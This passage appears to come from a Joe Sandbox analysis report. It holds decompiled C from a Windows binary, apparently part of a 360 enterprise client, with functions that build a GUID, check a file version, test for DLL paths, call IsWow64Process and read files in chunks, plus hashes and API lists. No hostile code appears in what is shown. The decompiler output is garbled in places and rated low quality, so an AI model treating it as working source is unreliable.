                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateErrorFileLast_vswprintf_s
                                                                                                                                                                                          • String ID: %02X%02X%02X%02X%02X%02X$\\.\%s
                                                                                                                                                                                          • API String ID: 3942810406-1525991222
                                                                                                                                                                                          • Opcode ID: a9be5fbb243a6761e7130b79722bba5a09719b582c302d62a4c994a72fd2935b
                                                                                                                                                                                          • Instruction ID: 316f539d4d5c4b7e4b5a33b079357673d9822928ec4b85183664f0c51af4af3e
                                                                                                                                                                                          • Opcode Fuzzy Hash: a9be5fbb243a6761e7130b79722bba5a09719b582c302d62a4c994a72fd2935b
                                                                                                                                                                                          • Instruction Fuzzy Hash: A54119B12043416BCB38DF64AC89F6BB7D8EB88714F140A2DF9A4C2281D778DA05C772
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC1003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 25%
                                                                                                                                                                                          			E00CC1003(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				void* __esi;
				signed int _t23;
				void* _t47;
				void* _t51;
				short* _t54;
				void* _t55;
				signed int _t56;
				void* _t58;

				_t52 = __edi;
				_t51 = __edx;
				_t47 = __ebx;
				_t56 = _t58 - 0x194;
				_t23 =  *0xd64070; // 0x8a9e1774
				 *(_t56 + 0x190) = _t23 ^ _t56;
				_t54 =  *((intOrPtr*)(_t56 + 0x19c));
				_t25 = 0;
				if(_t54 != 0) {
					 *_t54 = 0;
					if( *((intOrPtr*)(_t56 + 0x1a0)) >= 0x40) {
						E00D006A0(__edi, _t56 - 0x80, 0, 0x10);
						__imp__CoCreateGuid(_t56 - 0x80);
						E00D006A0(_t52, _t56 - 0x70, 0, 0x200);
						_push( *(_t56 - 0x71) & 0x000000ff);
						_push( *(_t56 - 0x72) & 0x000000ff);
						_push( *(_t56 - 0x73) & 0x000000ff);
						_push( *(_t56 - 0x74) & 0x000000ff);
						_push( *(_t56 - 0x75) & 0x000000ff);
						_push( *(_t56 - 0x76) & 0x000000ff);
						_push( *(_t56 - 0x77) & 0x000000ff);
						_push( *(_t56 - 0x78) & 0x000000ff);
						_push( *(_t56 - 0x7a) & 0x0000ffff);
						_push( *(_t56 - 0x7c) & 0x0000ffff);
						L00C9E05D(_t56 - 0x70, L"{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}",  *((intOrPtr*)(_t56 - 0x80)));
						E00D03717(_t54, _t56 - 0x70,  *((intOrPtr*)(_t56 + 0x1a0)));
						_t25 = 1;
					}
				}
				_pop(_t55);
				return E00D0071A(_t25, _t47,  *(_t56 + 0x190) ^ _t56, _t51, _t52, _t55);
			}











                                                                                                                                                                                          0x00cc1003
                                                                                                                                                                                          0x00cc1003
                                                                                                                                                                                          0x00cc1003
                                                                                                                                                                                          0x00cc1004
                                                                                                                                                                                          0x00cc1011
                                                                                                                                                                                          0x00cc1018
                                                                                                                                                                                          0x00cc101f
                                                                                                                                                                                          0x00cc1025
                                                                                                                                                                                          0x00cc1029
                                                                                                                                                                                          0x00cc1036
                                                                                                                                                                                          0x00cc1039
                                                                                                                                                                                          0x00cc1047
                                                                                                                                                                                          0x00cc1053
                                                                                                                                                                                          0x00cc1064
                                                                                                                                                                                          0x00cc106d
                                                                                                                                                                                          0x00cc1072
                                                                                                                                                                                          0x00cc1077
                                                                                                                                                                                          0x00cc107c
                                                                                                                                                                                          0x00cc1081
                                                                                                                                                                                          0x00cc1086
                                                                                                                                                                                          0x00cc108b
                                                                                                                                                                                          0x00cc1090
                                                                                                                                                                                          0x00cc1095
                                                                                                                                                                                          0x00cc109a
                                                                                                                                                                                          0x00cc10a7
                                                                                                                                                                                          0x00cc10ba
                                                                                                                                                                                          0x00cc10c4
                                                                                                                                                                                          0x00cc10c4
                                                                                                                                                                                          0x00cc1039
                                                                                                                                                                                          0x00cc10cd
                                                                                                                                                                                          0x00cc10da

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 00CC10A1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$CreateGuid_wcsncpy
                                                                                                                                                                                          • String ID: {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                                                                                                                                          • API String ID: 3058713236-891345449
                                                                                                                                                                                          • Opcode ID: ef4038d1ff6f386f7af4f96917e7b041c4232c0f0adb58f771095394d18d2b5b
                                                                                                                                                                                          • Instruction ID: e3544967bd5f2524ff196cf435e429e6f49168cc39c680d6552c56a9be105d18
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef4038d1ff6f386f7af4f96917e7b041c4232c0f0adb58f771095394d18d2b5b
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC214CB29005AC6EDB319BF98C15BFE7BFCAB0D300F140059F694E7182D66A96049F71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9B9E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E00C9B9E7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t15;
				intOrPtr* _t25;
				void* _t30;
				void* _t34;
				void* _t46;
				void* _t48;
				void* _t51;
				signed int _t52;
				void* _t54;
				void* _t59;

				_t59 = __eflags;
				_t47 = __edi;
				_t46 = __edx;
				_t52 = _t54 - 0xfc;
				_t15 =  *0xd64070; // 0x8a9e1774
				 *(_t52 + 0x100) = _t15 ^ _t52;
				_push(4);
				E00D0155A(0xd301e5, __ebx, __edi, __esi);
				 *_t52 = 0;
				E00D006A0(__edi, _t52 + 2, 0, 0xfe);
				E00D006A0(_t47, _t52, 0, 0x100);
				_push(L"\\360Entclient.exe");
				_push( *((intOrPtr*)(_t52 + 0x10c)));
				_push(_t52 - 0x10);
				_t25 = E00C9B7F5(__ebx, _t46, _t47,  *((intOrPtr*)(_t52 + 0x10c)), _t59);
				 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
				E00CE7ED6(__ebx, _t46,  *_t25, _t52, 0x80);
				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
				E00C9820F(_t52 - 0x10);
				_t30 = E00CE8689(_t59, _t52, L"3.11.23.2095");
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				_pop(_t48);
				_pop(_t51);
				_pop(_t34);
				return E00D0071A(0 | _t30 >= 0x00000000, _t34,  *(_t52 + 0x100) ^ _t52, _t46, _t48, _t51);
			}














                                                                                                                                                                                          0x00c9b9e7
                                                                                                                                                                                          0x00c9b9e7
                                                                                                                                                                                          0x00c9b9e7
                                                                                                                                                                                          0x00c9b9ee
                                                                                                                                                                                          0x00c9b9f2
                                                                                                                                                                                          0x00c9b9f9
                                                                                                                                                                                          0x00c9b9ff
                                                                                                                                                                                          0x00c9ba06
                                                                                                                                                                                          0x00c9ba19
                                                                                                                                                                                          0x00c9ba21
                                                                                                                                                                                          0x00c9ba31
                                                                                                                                                                                          0x00c9ba39
                                                                                                                                                                                          0x00c9ba3e
                                                                                                                                                                                          0x00c9ba42
                                                                                                                                                                                          0x00c9ba43
                                                                                                                                                                                          0x00c9ba4a
                                                                                                                                                                                          0x00c9ba58
                                                                                                                                                                                          0x00c9ba5d
                                                                                                                                                                                          0x00c9ba67
                                                                                                                                                                                          0x00c9ba75
                                                                                                                                                                                          0x00c9ba88
                                                                                                                                                                                          0x00c9ba90
                                                                                                                                                                                          0x00c9ba91
                                                                                                                                                                                          0x00c9ba92
                                                                                                                                                                                          0x00c9baa7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9BA06
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C9BA21
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C9BA31
                                                                                                                                                                                            • Part of subcall function 00C9B7F5: __EH_prolog3.LIBCMT ref: 00C9B7FC
                                                                                                                                                                                            • Part of subcall function 00C9B7F5: lstrlenW.KERNEL32(00000001,?,?,?,?,00000004), ref: 00C9B823
                                                                                                                                                                                            • Part of subcall function 00CE7ED6: _memset.LIBCMT ref: 00CE7F27
                                                                                                                                                                                            • Part of subcall function 00CE7ED6: GetFileVersionInfoSizeW.VERSION(?,?,?,?,00000080,?,?,?,?,?,00000004), ref: 00CE7F37
                                                                                                                                                                                            • Part of subcall function 00CE7ED6: GetFileVersionInfoW.VERSION(?,00000000,00000000,?,?,?,?,?,00000080,?,?,?,?,?,00000004), ref: 00CE7F52
                                                                                                                                                                                            • Part of subcall function 00CE7ED6: VerQueryValueW.VERSION(?,00D48B4C,?,?,?,00000000,00000000,?,?,?,?,?,00000080), ref: 00CE7F75
                                                                                                                                                                                            • Part of subcall function 00CE7ED6: _memset.LIBCMT ref: 00CE7F84
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$FileH_prolog3InfoVersion$DecrementInterlockedQuerySizeValuelstrlen
                                                                                                                                                                                          • String ID: 3.11.23.2095$\360Entclient.exe
                                                                                                                                                                                          • API String ID: 1880763216-2857425108
                                                                                                                                                                                          • Opcode ID: f02cfb5f5ac3602246df0ac7e72de28cde7a2a442c000b0b2e9cf68729aeff9d
                                                                                                                                                                                          • Instruction ID: bd4ce7467fb6cca046d300f830804e71ed0e004069dbc46347a885308c81c67c
                                                                                                                                                                                          • Opcode Fuzzy Hash: f02cfb5f5ac3602246df0ac7e72de28cde7a2a442c000b0b2e9cf68729aeff9d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E118676A40248BBDB14EFA4EC46BDD73A8FF08310F404519B959DB1C0EBB4A608C664
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9B95F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00C9B95F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				WCHAR** _t24;
				int _t25;
				WCHAR** _t32;
				int _t33;
				void* _t44;
				void* _t45;

				_t45 = __eflags;
				_t40 = __edx;
				_push(0x10);
				E00D0155A(0xd301c2, __ebx, __edi, __esi);
				 *(_t44 - 0x14) =  *(_t44 - 0x14) & 0x00000000;
				_push(L"\\entclient\\QhEntinfo.dll");
				_push( *((intOrPtr*)(_t44 + 8)));
				_push(_t44 - 0x1c);
				_t24 = E00C9B7F5(__ebx, __edx, __edi, __esi, _t45);
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t36 = 1;
				 *(_t44 - 0x14) = 1;
				_t25 = PathFileExistsW( *_t24);
				_t46 = _t25;
				if(_t25 != 0) {
					L2:
					 *((char*)(_t44 - 0xd)) = 1;
				} else {
					_push(L"\\deepscan\\QhEntinfo.dll");
					_push( *((intOrPtr*)(_t44 + 8)));
					_push(_t44 - 0x18);
					_t32 = E00C9B7F5(1, _t40, __edi, PathFileExistsW, _t46);
					_t36 = 3;
					_t33 = PathFileExistsW( *_t32);
					 *((char*)(_t44 - 0xd)) = 0;
					if(_t33 != 0) {
						goto L2;
					}
				}
				if((_t36 & 0x00000002) != 0) {
					_t36 = _t36 & 0xfffffffd;
					E00C9820F(_t44 - 0x18);
				}
				if((_t36 & 0x00000001) != 0) {
					E00C9820F(_t44 - 0x1c);
				}
				return E00D01632(0 |  *((intOrPtr*)(_t44 - 0xd)) != 0x00000000);
			}









                                                                                                                                                                                          0x00c9b95f
                                                                                                                                                                                          0x00c9b95f
                                                                                                                                                                                          0x00c9b95f
                                                                                                                                                                                          0x00c9b966
                                                                                                                                                                                          0x00c9b96b
                                                                                                                                                                                          0x00c9b96f
                                                                                                                                                                                          0x00c9b974
                                                                                                                                                                                          0x00c9b97a
                                                                                                                                                                                          0x00c9b97b
                                                                                                                                                                                          0x00c9b988
                                                                                                                                                                                          0x00c9b98e
                                                                                                                                                                                          0x00c9b98f
                                                                                                                                                                                          0x00c9b992
                                                                                                                                                                                          0x00c9b994
                                                                                                                                                                                          0x00c9b996
                                                                                                                                                                                          0x00c9b9b8
                                                                                                                                                                                          0x00c9b9b8
                                                                                                                                                                                          0x00c9b998
                                                                                                                                                                                          0x00c9b998
                                                                                                                                                                                          0x00c9b99d
                                                                                                                                                                                          0x00c9b9a3
                                                                                                                                                                                          0x00c9b9a4
                                                                                                                                                                                          0x00c9b9ab
                                                                                                                                                                                          0x00c9b9ae
                                                                                                                                                                                          0x00c9b9b0
                                                                                                                                                                                          0x00c9b9b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b9b6
                                                                                                                                                                                          0x00c9b9bf
                                                                                                                                                                                          0x00c9b9c4
                                                                                                                                                                                          0x00c9b9c7
                                                                                                                                                                                          0x00c9b9c7
                                                                                                                                                                                          0x00c9b9cf
                                                                                                                                                                                          0x00c9b9d4
                                                                                                                                                                                          0x00c9b9d4
                                                                                                                                                                                          0x00c9b9e6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9B966
                                                                                                                                                                                            • Part of subcall function 00C9B7F5: __EH_prolog3.LIBCMT ref: 00C9B7FC
                                                                                                                                                                                            • Part of subcall function 00C9B7F5: lstrlenW.KERNEL32(00000001,?,?,?,?,00000004), ref: 00C9B823
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,00000010), ref: 00C9B992
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,00000010), ref: 00C9B9AE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \entclient\QhEntinfo.dll, xrefs: 00C9B96F
                                                                                                                                                                                          • \deepscan\QhEntinfo.dll, xrefs: 00C9B998
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFileH_prolog3Path$lstrlen
                                                                                                                                                                                          • String ID: \deepscan\QhEntinfo.dll$\entclient\QhEntinfo.dll
                                                                                                                                                                                          • API String ID: 1062121050-4290025935
                                                                                                                                                                                          • Opcode ID: f37c3cc39e8c933f4f6c9a5fa41eaf796856d71723b9878d53ffcf417d05e6f5
                                                                                                                                                                                          • Instruction ID: 4b79823338bdd6f94b1dfab7e55525fbcfeda882df2c782b7f10d60c7e064c0b
                                                                                                                                                                                          • Opcode Fuzzy Hash: f37c3cc39e8c933f4f6c9a5fa41eaf796856d71723b9878d53ffcf417d05e6f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: BA01D430D5130AAEDF01ABA8DE4EBED7BB8AF00344F044055A565A71E2EBB48E48D760
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8F400 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00C8F400() {
				char _v4;
				intOrPtr _v12;
				void* _t9;
				intOrPtr* _t11;

				_t11 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				_v4 = 0;
				if(_t11 == 0) {
					return 0;
				} else {
					_t9 =  *_t11(GetCurrentProcess(),  &_v4);
					if(_t9 != 0) {
						return _v12;
					}
					return _t9;
				}
			}







                                                                                                                                                                                          0x00c8f419
                                                                                                                                                                                          0x00c8f41d
                                                                                                                                                                                          0x00c8f423
                                                                                                                                                                                          0x00c8f440
                                                                                                                                                                                          0x00c8f425
                                                                                                                                                                                          0x00c8f431
                                                                                                                                                                                          0x00c8f435
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8f43a
                                                                                                                                                                                          0x00c8f439
                                                                                                                                                                                          0x00c8f439

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00C8F495), ref: 00C8F40C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00C8F413
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00C8F495,?,00C8F495), ref: 00C8F42A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                          • String ID: IsWow64Process$kernel32
                                                                                                                                                                                          • API String ID: 4190356694-3789238822
                                                                                                                                                                                          • Opcode ID: f43d392eb1368c35f49e0dd54881aaa3b4261bb21675872cb40e5eb482458c85
                                                                                                                                                                                          • Instruction ID: 2eba0eac9af778c6c299b278e1e54a4aa4af65b5dbd30ea8dc3b8d7b5a856860
                                                                                                                                                                                          • Opcode Fuzzy Hash: f43d392eb1368c35f49e0dd54881aaa3b4261bb21675872cb40e5eb482458c85
                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E04F72A02720AF8610BBF89C08DDB7B98EA84B91700482AF549C3200DB70C801AB72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C84E40 Relevance: 7.7, APIs: 5, Instructions: 214fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 32%
                                                                                                                                                                                          			E00C84E40(intOrPtr* __eax, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a28) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _v24;
				long* _v28;
				long* _v40;
				void* __edi;
				void* __esi;
				long _t49;
				signed int _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				long _t57;
				long _t63;
				int _t67;
				long _t70;
				long _t71;
				long _t72;
				int _t73;
				int _t75;
				long _t79;
				long _t80;
				long _t81;
				long _t82;
				union _LARGE_INTEGER* _t83;
				long* _t86;
				signed int _t94;
				intOrPtr* _t95;
				intOrPtr _t105;
				signed int _t106;
				long _t107;
				long _t109;
				void* _t110;
				signed int* _t111;

				_t111 =  &_v24;
				_t110 = __eax + 0xccc;
				_t49 =  *((intOrPtr*)(__eax));
				_v12 = _t49;
				__imp__GetFileSizeEx(_t49, _a28);
				if(_t49 != 0) {
					_t86 = _v4 + 8;
					_t103 = 0;
					_t83 = 0;
					__eflags = 0 - _v0;
					_v16 = 0;
					_v28 = _t86;
					do {
						if(__eflags != 0) {
							_t105 =  *((intOrPtr*)(_t86 - 8));
							_t51 =  *(_t86 - 4);
						} else {
							_t95 = _a20;
							_t105 =  *_t95;
							_t51 =  *(_t95 + 4);
						}
						_t106 = _t105 - _t103;
						asm("sbb eax, ebx");
						_t94 = (_t51 << 0x00000020 | _t106) >> 0xf;
						_t107 = _t106 & 0x00007fff;
						__eflags = _t107;
						_v24 = _t94;
						if(_t107 != 0) {
							_t94 = _t94 + 1;
							__eflags = _t94;
							_v24 = _t94;
						} else {
							_t107 = 0x8000;
						}
						__eflags = _t94;
						if(_t94 <= 0) {
							L19:
							_t53 = _v16;
							__eflags = _t53 - _v0;
							if(_t53 >= _v0) {
								goto L33;
							} else {
								_t108 =  *_t86;
								__eflags =  *_t86;
								if( *_t86 == 0) {
									break;
								} else {
									__eflags = _t86[2];
									if(_t86[2] != 0) {
										L27:
										_t109 = _a4;
										__eflags = _t109;
										if(_t109 == 0) {
											L32:
											_t83 =  *(_t86 - 4);
											_t53 = _v16;
											_t103 =  *_t86 +  *((intOrPtr*)(_t86 - 8));
											asm("adc ebx, edx");
											goto L33;
										} else {
											__eflags = _t86[1];
											if(_t86[1] == 0) {
												goto L32;
											} else {
												_t57 =  *_t86;
												__eflags = _t57 - 0x8000;
												if(_t57 > 0x8000) {
													E00C88420(8, 0xd47270);
													__eflags = 0;
													return 0;
												} else {
													E00D006A0(_t103, _t110, 0, _t57);
													_t111 =  &(_t111[3]);
													_t63 =  *_t109(_a8, _t110,  *_v28);
													__eflags = _t63;
													if(_t63 == 0) {
														goto L37;
													} else {
														_t86 = _v40;
														goto L32;
													}
												}
											}
										}
									} else {
										_push(0);
										_t103 = _v20;
										_t67 = SetFilePointerEx(_v20, _v20, _t83, 0);
										__eflags = _t67;
										if(_t67 == 0) {
											goto L1;
										} else {
											_t70 = E00C83E90(_t103, _t108);
											__eflags = _t70;
											if(_t70 == 0) {
												goto L38;
											} else {
												_t71 = _a12;
												__eflags = _t71;
												if(_t71 == 0) {
													L26:
													_t86 = _v28;
													goto L27;
												} else {
													_t72 =  *_t71(_a16, _t110,  *_v28);
													__eflags = _t72;
													if(_t72 == 0) {
														goto L37;
													} else {
														goto L26;
													}
												}
											}
										}
									}
								}
							}
						} else {
							while(1) {
								_push(0);
								_t73 = SetFilePointerEx(_v20, _t103, _t83, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									goto L1;
								}
								_t75 = ReadFile(_v20, _t110, _t107,  &_v12, 0);
								__eflags = _t75;
								if(_t75 == 0) {
									goto L1;
								} else {
									__eflags = _t107 - _v12;
									if(_t107 != _v12) {
										E00C88420(1, 0xd47270);
										__eflags = 0;
										return 0;
									} else {
										_t79 = _a4;
										__eflags = _t79;
										if(_t79 == 0) {
											L15:
											_t80 = _a12;
											__eflags = _t80;
											if(_t80 == 0) {
												L17:
												_t103 = _t103 + _t107;
												asm("adc ebx, 0x0");
												_t26 =  &_v24;
												 *_t26 = _v24 - 1;
												__eflags =  *_t26;
												_t107 = 0x8000;
												if( *_t26 != 0) {
													continue;
												} else {
													_t86 = _v28;
													goto L19;
												}
											} else {
												_t81 =  *_t80(_a16, _t110, _t107);
												__eflags = _t81;
												if(_t81 == 0) {
													goto L37;
												} else {
													goto L17;
												}
											}
										} else {
											_t82 =  *_t79(_a8, _t110, _t107);
											__eflags = _t82;
											if(_t82 == 0) {
												L37:
												E00C88420(0x11, 0xd47270);
												L38:
												__eflags = 0;
												return 0;
											} else {
												goto L15;
											}
										}
									}
								}
								goto L39;
							}
							goto L1;
						}
						goto L39;
						L33:
						_t54 = _t53 + 1;
						_t86 =  &(_t86[6]);
						_v16 = _t54;
						_v28 = _t86;
						__eflags = _t54 - _v0;
					} while (__eflags <= 0);
					return 1;
				} else {
					L1:
					_push(0xd47270);
					_push(0);
					_push(0);
					E00C88150(0xd47270);
					return 0;
				}
				L39:
			}







































                                                                                                                                                                                          0x00c84e40
                                                                                                                                                                                          0x00c84e4b
                                                                                                                                                                                          0x00c84e51
                                                                                                                                                                                          0x00c84e55
                                                                                                                                                                                          0x00c84e59
                                                                                                                                                                                          0x00c84e61
                                                                                                                                                                                          0x00c84e89
                                                                                                                                                                                          0x00c84e8c
                                                                                                                                                                                          0x00c84e8e
                                                                                                                                                                                          0x00c84e90
                                                                                                                                                                                          0x00c84e94
                                                                                                                                                                                          0x00c84e98
                                                                                                                                                                                          0x00c84e9c
                                                                                                                                                                                          0x00c84e9c
                                                                                                                                                                                          0x00c84eab
                                                                                                                                                                                          0x00c84eae
